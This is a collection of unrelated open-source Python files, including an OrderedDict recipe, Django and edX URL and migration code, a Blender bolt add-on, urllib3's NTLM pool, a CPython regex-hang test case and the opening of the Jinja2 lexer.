# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
        'od.itervalues() -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
        'od.iteritems() -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
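# A short demonstration, not part of the original recipe: insertion order is
# preserved (updates keep a key's slot) and popitem() is LIFO by default.
if __name__ == '__main__':
    od = OrderedDict([('one', 1), ('two', 2), ('three', 3)])
    od['two'] = 22  # updating an existing key keeps its position
    assert od.keys() == ['one', 'two', 'three']
    assert od.popitem() == ('three', 3)            # LIFO
    assert od.popitem(last=False) == ('one', 1)    # FIFO
    print od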
|
xuxiao19910803/edx-platform | refs/heads/master | lms/djangoapps/django_comment_client/base/urls.py | 102 | from django.conf.urls.defaults import url, patterns
urlpatterns = patterns(
'django_comment_client.base.views',
url(r'upload$', 'upload', name='upload'),
url(r'threads/(?P<thread_id>[\w\-]+)/update$', 'update_thread', name='update_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/reply$', 'create_comment', name='create_comment'),
    url(r'threads/(?P<thread_id>[\w\-]+)/delete$', 'delete_thread', name='delete_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/upvote$', 'vote_for_thread', {'value': 'up'}, name='upvote_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/downvote$', 'vote_for_thread', {'value': 'down'}, name='downvote_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/flagAbuse$', 'flag_abuse_for_thread', name='flag_abuse_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unFlagAbuse$', 'un_flag_abuse_for_thread', name='un_flag_abuse_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unvote$', 'undo_vote_for_thread', name='undo_vote_for_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/pin$', 'pin_thread', name='pin_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unpin$', 'un_pin_thread', name='un_pin_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/follow$', 'follow_thread', name='follow_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/unfollow$', 'unfollow_thread', name='unfollow_thread'),
url(r'threads/(?P<thread_id>[\w\-]+)/close$', 'openclose_thread', name='openclose_thread'),
url(r'comments/(?P<comment_id>[\w\-]+)/update$', 'update_comment', name='update_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/endorse$', 'endorse_comment', name='endorse_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/reply$', 'create_sub_comment', name='create_sub_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/delete$', 'delete_comment', name='delete_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/upvote$', 'vote_for_comment', {'value': 'up'}, name='upvote_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/downvote$', 'vote_for_comment', {'value': 'down'}, name='downvote_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/unvote$', 'undo_vote_for_comment', name='undo_vote_for_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/flagAbuse$', 'flag_abuse_for_comment', name='flag_abuse_for_comment'),
url(r'comments/(?P<comment_id>[\w\-]+)/unFlagAbuse$', 'un_flag_abuse_for_comment', name='un_flag_abuse_for_comment'),
url(r'^(?P<commentable_id>[\w\-.]+)/threads/create$', 'create_thread', name='create_thread'),
url(r'^(?P<commentable_id>[\w\-.]+)/follow$', 'follow_commentable', name='follow_commentable'),
url(r'^(?P<commentable_id>[\w\-.]+)/unfollow$', 'unfollow_commentable', name='unfollow_commentable'),
url(r'users$', 'users', name='users'),
)
|
BT-ojossen/odoo | refs/heads/8.0 | addons/pos_discount/__openerp__.py | 312 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Point of Sale Discounts',
'version': '1.0',
'category': 'Point of Sale',
'sequence': 6,
'summary': 'Simple Discounts in the Point of Sale ',
'description': """
Point of Sale Discounts
=======================
This module allows the cashier to quickly give a percentage
sale discount to a customer.
""",
'author': 'OpenERP SA',
'depends': ['point_of_sale'],
'data': [
'views/views.xml',
'views/templates.xml'
],
'installable': True,
'website': 'https://www.odoo.com/page/point-of-sale',
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
kevinmel2000/sl4a | refs/heads/master | python/src/Lib/test/crashers/infinite_loop_re.py | 346 |
# This was taken from http://python.org/sf/1541697
# It's not technically a crasher. It may not even truly be infinite,
# however, I haven't waited a long time to see the result. It takes
# 100% of CPU while running this and should be fixed.
import re
starttag = re.compile(r'<[a-zA-Z][-_.:a-zA-Z0-9]*\s*('
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~@]'
r'[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*(?=[\s>/<])))?'
r')*\s*/?\s*(?=[<>])')
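# Why it hangs (added note): the inner alternation is repeated under an outer
# '*', so for a non-matching input such as the unterminated tag below the
# backtracking engine has exponentially many ways to re-partition the
# attribute text; this is the classic catastrophic-backtracking pattern.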
if __name__ == '__main__':
foo = '<table cellspacing="0" cellpadding="0" style="border-collapse'
starttag.match(foo)
|
sagark123/coala | refs/heads/master | coalib/results/result_actions/PrintAspectAction.py | 17 | from coalib.results.Result import Result
from coalib.results.result_actions.ResultAction import ResultAction
from coala_utils.decorators import enforce_signature
class PrintAspectAction(ResultAction):
@staticmethod
@enforce_signature
def is_applicable(result: Result, original_file_dict, file_diff_dict):
if result.aspect is None:
return 'There is no aspect associated with the result.'
return True
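    # Added note (based on coala's ResultAction convention): returning True
    # marks the action as applicable, while a returned string is shown to the
    # user as the reason it is not.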
def apply(self, result, original_file_dict, file_diff_dict):
"""
Print Aspect Information
"""
print(type(result.aspect).__qualname__ + '\n' +
type(result.aspect).docs.definition)
return file_diff_dict
|
smira/aptly | refs/heads/master | system/t05_snapshot/__init__.py | 3 | """
Testing snapshot management
"""
|
ThinkboxSoftware/Deadline | refs/heads/master | Custom/events/SetJobLimit/SetJobLimit.py | 1 | ###############################################################
# Imports
###############################################################
from Deadline.Events import *
from Deadline.Scripting import *
###############################################################
# This is the function called by Deadline to get an instance of the Draft event listener.
###############################################################
def GetDeadlineEventListener():
return SetJobLimitListener()
def CleanupDeadlineEventListener(eventListener):
eventListener.Cleanup()
###############################################################
# The event listener class.
###############################################################
class SetJobLimitListener (DeadlineEventListener):
def __init__(self):
self.OnJobSubmittedCallback += self.OnJobSubmitted
def Cleanup(self):
del self.OnJobSubmittedCallback
def OnJobSubmitted(self, job):
        limitNames = [name.strip() for name in self.GetConfigEntry("JobLimits").split(',')]
        # Compare case-insensitively so differently-cased limit group names
        # do not end up duplicated on the job.
        lowerNames = [name.lower() for name in limitNames]
        for limitName in job.JobLimitGroups:
            if limitName.lower() not in lowerNames:
                limitNames.append(limitName)
job.SetJobLimitGroups(limitNames)
RepositoryUtils.SaveJob(job)
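        # Worked example (illustrative values): with a "JobLimits" config
        # entry of "license_a,license_b" and a job submitted in group
        # "license_b", the merge above saves ['license_a', 'license_b']
        # rather than appending a duplicate.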
|
PLyczkowski/Sticky-Keymap | refs/heads/master | 2.74/scripts/addons/add_mesh_BoltFactory/Boltfactory.py | 3 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from bpy.props import *
from add_mesh_BoltFactory.createMesh import *
from add_mesh_BoltFactory.preset_utils import *
##------------------------------------------------------------
# calculates the matrix for the new object
# depending on user pref
def align_matrix(context):
loc = mathutils.Matrix.Translation(context.scene.cursor_location)
obj_align = context.user_preferences.edit.object_align
if (context.space_data.type == 'VIEW_3D'
and obj_align == 'VIEW'):
rot = context.space_data.region_3d.view_matrix.to_3x3().inverted().to_4x4()
else:
rot = mathutils.Matrix()
align_matrix = loc * rot
return align_matrix
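# Illustrative example (added note): with the 3D cursor at the world origin
# and object_align set to 'WORLD', both loc and rot are identity matrices, so
# the generated bolt appears unrotated at the origin.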
class add_mesh_bolt(bpy.types.Operator):
""""""
bl_idname = "mesh.bolt_add"
bl_label = "Add Bolt"
bl_options = {'REGISTER', 'UNDO', 'PRESET'}
bl_description = "adds many types of Bolts"
align_matrix = mathutils.Matrix()
MAX_INPUT_NUMBER = 50
# edit - Whether to add or update.
edit = BoolProperty(name="",
description="",
default=False,
options={'HIDDEN'})
#Model Types
Model_Type_List = [('bf_Model_Bolt','BOLT','Bolt Model'),
('bf_Model_Nut','NUT','Nut Model')]
bf_Model_Type = EnumProperty( attr='bf_Model_Type',
name='Model',
            description='Choose the type of model you would like',
items = Model_Type_List, default = 'bf_Model_Bolt')
#Head Types
    Head_Type_List = [('bf_Head_Hex','HEX','Hex Head'),
                    ('bf_Head_Cap','CAP','Cap Head'),
                    ('bf_Head_Dome','DOME','Dome Head'),
                    ('bf_Head_Pan','PAN','Pan Head'),
                    ('bf_Head_CounterSink','COUNTER SINK','Counter Sink Head')]
    bf_Head_Type = EnumProperty( attr='bf_Head_Type',
            name='Head',
            description='Choose the type of Head you would like',
            items = Head_Type_List, default = 'bf_Head_Hex')
#Bit Types
Bit_Type_List = [('bf_Bit_None','NONE','No Bit Type'),
('bf_Bit_Allen','ALLEN','Allen Bit Type'),
('bf_Bit_Philips','PHILLIPS','Phillips Bit Type')]
bf_Bit_Type = EnumProperty( attr='bf_Bit_Type',
name='Bit Type',
            description='Choose the type of bit you would like',
items = Bit_Type_List, default = 'bf_Bit_None')
#Nut Types
Nut_Type_List = [('bf_Nut_Hex','HEX','Hex Nut'),
('bf_Nut_Lock','LOCK','Lock Nut')]
bf_Nut_Type = EnumProperty( attr='bf_Nut_Type',
name='Nut Type',
description='Choose the type of nut you would like',
items = Nut_Type_List, default = 'bf_Nut_Hex')
#Shank Types
bf_Shank_Length = FloatProperty(attr='bf_Shank_Length',
name='Shank Length', default = 0,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Length of the unthreaded shank')
bf_Shank_Dia = FloatProperty(attr='bf_Shank_Dia',
name='Shank Dia', default = 3,
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Diameter of the shank')
bf_Phillips_Bit_Depth = FloatProperty(attr='bf_Phillips_Bit_Depth',
name='Bit Depth', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Depth of the Phillips Bit')
bf_Allen_Bit_Depth = FloatProperty(attr='bf_Allen_Bit_Depth',
name='Bit Depth', default = 1.5,
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Depth of the Allen Bit')
bf_Allen_Bit_Flat_Distance = FloatProperty( attr='bf_Allen_Bit_Flat_Distance',
name='Flat Dist', default = 2.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat Distance of the Allen Bit')
bf_Hex_Head_Height = FloatProperty( attr='bf_Hex_Head_Height',
name='Head Height', default = 2,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Hex Head')
bf_Hex_Head_Flat_Distance = FloatProperty( attr='bf_Hex_Head_Flat_Distance',
name='Flat Dist', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat Distance of the Hex Head')
bf_CounterSink_Head_Dia = FloatProperty( attr='bf_CounterSink_Head_Dia',
name='Head Dia', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Counter Sink Head')
bf_Cap_Head_Height = FloatProperty( attr='bf_Cap_Head_Height',
name='Head Height', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Cap Head')
bf_Cap_Head_Dia = FloatProperty( attr='bf_Cap_Head_Dia',
name='Head Dia', default = 3,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Cap Head')
bf_Dome_Head_Dia = FloatProperty( attr='bf_Dome_Head_Dia',
name='Dome Head Dia', default = 5.6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
            description='Diameter of the Dome Head')
bf_Pan_Head_Dia = FloatProperty( attr='bf_Pan_Head_Dia',
name='Pan Head Dia', default = 5.6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Diameter of the Pan Head')
bf_Philips_Bit_Dia = FloatProperty(attr='bf_Philips_Bit_Dia',
name='Bit Dia', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0,max = MAX_INPUT_NUMBER,
description='Diameter of the Philips Bit')
bf_Thread_Length = FloatProperty( attr='bf_Thread_Length',
name='Thread Length', default = 6,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Length of the Thread')
bf_Major_Dia = FloatProperty( attr='bf_Major_Dia',
name='Major Dia', default = 3,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Outside diameter of the Thread')
bf_Pitch = FloatProperty( attr='bf_Pitch',
name='Pitch', default = 0.35,
min = 0.1, soft_min = 0.1, max = 7.0,
            description='Pitch of the thread')
bf_Minor_Dia = FloatProperty( attr='bf_Minor_Dia',
name='Minor Dia', default = 0, #set in execute
options = {'HIDDEN'}, #gets calculated in execute
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Inside diameter of the Thread')
bf_Crest_Percent = IntProperty( attr='bf_Crest_Percent',
name='Crest Percent', default = 10,
min = 1, soft_min = 1, max = 90,
description='Percent of the pitch that makes up the Crest')
bf_Root_Percent = IntProperty( attr='bf_Root_Percent',
name='Root Percent', default = 10,
min = 1, soft_min = 1, max = 90,
description='Percent of the pitch that makes up the Root')
bf_Hex_Nut_Height = FloatProperty( attr='bf_Hex_Nut_Height',
name='Hex Nut Height', default = 2.4,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Height of the Hex Nut')
bf_Hex_Nut_Flat_Distance = FloatProperty( attr='bf_Hex_Nut_Flat_Distance',
name='Hex Nut Flat Dist', default = 5.5,
min = 0, soft_min = 0, max = MAX_INPUT_NUMBER,
description='Flat distance of the Hex Nut')
presets, presetsPath = getPresets()
bf_presets = EnumProperty(attr='bf_presets',
name='Preset',
description="Use Preset from File",
default='M3.py',
items=presets)
last_preset = None
def draw(self, context):
layout = self.layout
col = layout.column()
#ENUMS
col.prop(self, 'bf_Model_Type')
col.prop(self, 'bf_presets')
col.separator()
#Bit
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Bit_Type')
if self.bf_Bit_Type == 'bf_Bit_None':
pass
elif self.bf_Bit_Type == 'bf_Bit_Allen':
col.prop(self, 'bf_Allen_Bit_Depth')
col.prop(self, 'bf_Allen_Bit_Flat_Distance')
elif self.bf_Bit_Type == 'bf_Bit_Philips':
col.prop(self, 'bf_Phillips_Bit_Depth')
col.prop(self, 'bf_Philips_Bit_Dia')
col.separator()
#Head
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Head_Type')
if self.bf_Head_Type == 'bf_Head_Hex':
col.prop(self, 'bf_Hex_Head_Height')
col.prop(self, 'bf_Hex_Head_Flat_Distance')
elif self.bf_Head_Type == 'bf_Head_Cap':
col.prop(self, 'bf_Cap_Head_Height')
col.prop(self, 'bf_Cap_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_Dome':
col.prop(self, 'bf_Dome_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_Pan':
col.prop(self, 'bf_Pan_Head_Dia')
elif self.bf_Head_Type == 'bf_Head_CounterSink':
col.prop(self, 'bf_CounterSink_Head_Dia')
col.separator()
#Shank
if self.bf_Model_Type == 'bf_Model_Bolt':
col.label(text='Shank')
col.prop(self, 'bf_Shank_Length')
col.prop(self, 'bf_Shank_Dia')
col.separator()
#Nut
if self.bf_Model_Type == 'bf_Model_Nut':
col.prop(self, 'bf_Nut_Type')
col.prop(self, 'bf_Hex_Nut_Height')
col.prop(self, 'bf_Hex_Nut_Flat_Distance')
#Thread
col.label(text='Thread')
if self.bf_Model_Type == 'bf_Model_Bolt':
col.prop(self, 'bf_Thread_Length')
col.prop(self, 'bf_Major_Dia')
col.prop(self, 'bf_Minor_Dia')
col.prop(self, 'bf_Pitch')
col.prop(self, 'bf_Crest_Percent')
col.prop(self, 'bf_Root_Percent')
##### POLL #####
@classmethod
def poll(cls, context):
return context.scene != None
##### EXECUTE #####
def execute(self, context):
#print('EXECUTING...')
if not self.last_preset or self.bf_presets != self.last_preset:
#print('setting Preset', self.bf_presets)
setProps(self, self.bf_presets, self.presetsPath)
self.bf_Phillips_Bit_Depth = float(Get_Phillips_Bit_Height(self.bf_Philips_Bit_Dia))
self.last_preset = self.bf_presets
#self.bf_Phillips_Bit_Depth = float(Get_Phillips_Bit_Height(self.bf_Philips_Bit_Dia))
#self.bf_Philips_Bit_Dia = self.bf_Pan_Head_Dia*(1.82/5.6)
#self.bf_Minor_Dia = self.bf_Major_Dia - (1.082532 * self.bf_Pitch)
Create_New_Mesh(self, context, self.align_matrix)
return {'FINISHED'}
##### INVOKE #####
def invoke(self, context, event):
#print('\n___________START_____________')
# store creation_matrix
self.align_matrix = align_matrix(context)
self.execute(context)
return {'FINISHED'}
|
hagifoo/gae-pomodoro | refs/heads/master | app/lib/requests/packages/urllib3/contrib/ntlmpool.py | 714 | # urllib3/contrib/ntlmpool.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s' %
(self.num_connections, self.host, self.authurl))
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % reshdr)
log.debug('Response data: %s [...]' % res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value)
auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge,
self.user,
self.domain,
self.pw,
NegotiateFlags)
headers[req_header] = 'NTLM %s' % auth_msg
log.debug('Request headers: %s' % headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
log.debug('Response status: %s %s' % (res.status, res.reason))
log.debug('Response headers: %s' % dict(res.getheaders()))
log.debug('Response data: %s [...]' % res.read()[:100])
if res.status != 200:
if res.status == 401:
raise Exception('Server rejected request: wrong '
'username or password')
raise Exception('Wrong server response: %s %s' %
(res.status, res.reason))
res.fp = None
log.debug('Connection established')
return conn
def urlopen(self, method, url, body=None, headers=None, retries=3,
redirect=True, assert_same_host=True):
if headers is None:
headers = {}
headers['Connection'] = 'Keep-Alive'
return super(NTLMConnectionPool, self).urlopen(method, url, body,
headers, retries,
redirect,
assert_same_host)
|
TridevGuha/django | refs/heads/master | tests/migrations/test_migrations_squashed_erroneous/1_auto.py | 1155 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
operations = [
migrations.RunPython(migrations.RunPython.noop)
]
|
sotdjin/glibglab | refs/heads/master | venv/lib/python2.7/site-packages/jinja2/lexer.py | 346 | # -*- coding: utf-8 -*-
"""
jinja2.lexer
~~~~~~~~~~~~
This module implements a Jinja / Python combination lexer. The
`Lexer` class provided by this module is used to do some preprocessing
for Jinja.
On the one hand it filters out invalid operators like the bitshift
operators we don't allow in templates. On the other hand it separates
template code and python code in expressions.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import re
from operator import itemgetter
from collections import deque
from jinja2.exceptions import TemplateSyntaxError
from jinja2.utils import LRUCache
from jinja2._compat import iteritems, implements_iterator, text_type, \
intern, PY2
# cache for the lexers. Exists in order to be able to have multiple
# environments with the same lexer
_lexer_cache = LRUCache(50)
# static regular expressions
whitespace_re = re.compile(r'\s+', re.U)
string_re = re.compile(r"('([^'\\]*(?:\\.[^'\\]*)*)'"
r'|"([^"\\]*(?:\\.[^"\\]*)*)")', re.S)
integer_re = re.compile(r'\d+')
# we use the unicode identifier rule if this python version is able
# to handle unicode identifiers, otherwise the standard ASCII one.
try:
compile('föö', '<unknown>', 'eval')
except SyntaxError:
name_re = re.compile(r'\b[a-zA-Z_][a-zA-Z0-9_]*\b')
else:
from jinja2 import _stringdefs
name_re = re.compile(r'[%s][%s]*' % (_stringdefs.xid_start,
_stringdefs.xid_continue))
float_re = re.compile(r'(?<!\.)\d+\.\d+')
newline_re = re.compile(r'(\r\n|\r|\n)')
# internal the tokens and keep references to them
TOKEN_ADD = intern('add')
TOKEN_ASSIGN = intern('assign')
TOKEN_COLON = intern('colon')
TOKEN_COMMA = intern('comma')
TOKEN_DIV = intern('div')
TOKEN_DOT = intern('dot')
TOKEN_EQ = intern('eq')
TOKEN_FLOORDIV = intern('floordiv')
TOKEN_GT = intern('gt')
TOKEN_GTEQ = intern('gteq')
TOKEN_LBRACE = intern('lbrace')
TOKEN_LBRACKET = intern('lbracket')
TOKEN_LPAREN = intern('lparen')
TOKEN_LT = intern('lt')
TOKEN_LTEQ = intern('lteq')
TOKEN_MOD = intern('mod')
TOKEN_MUL = intern('mul')
TOKEN_NE = intern('ne')
TOKEN_PIPE = intern('pipe')
TOKEN_POW = intern('pow')
TOKEN_RBRACE = intern('rbrace')
TOKEN_RBRACKET = intern('rbracket')
TOKEN_RPAREN = intern('rparen')
TOKEN_SEMICOLON = intern('semicolon')
TOKEN_SUB = intern('sub')
TOKEN_TILDE = intern('tilde')
TOKEN_WHITESPACE = intern('whitespace')
TOKEN_FLOAT = intern('float')
TOKEN_INTEGER = intern('integer')
TOKEN_NAME = intern('name')
TOKEN_STRING = intern('string')
TOKEN_OPERATOR = intern('operator')
TOKEN_BLOCK_BEGIN = intern('block_begin')
TOKEN_BLOCK_END = intern('block_end')
TOKEN_VARIABLE_BEGIN = intern('variable_begin')
TOKEN_VARIABLE_END = intern('variable_end')
TOKEN_RAW_BEGIN = intern('raw_begin')
TOKEN_RAW_END = intern('raw_end')
TOKEN_COMMENT_BEGIN = intern('comment_begin')
TOKEN_COMMENT_END = intern('comment_end')
TOKEN_COMMENT = intern('comment')
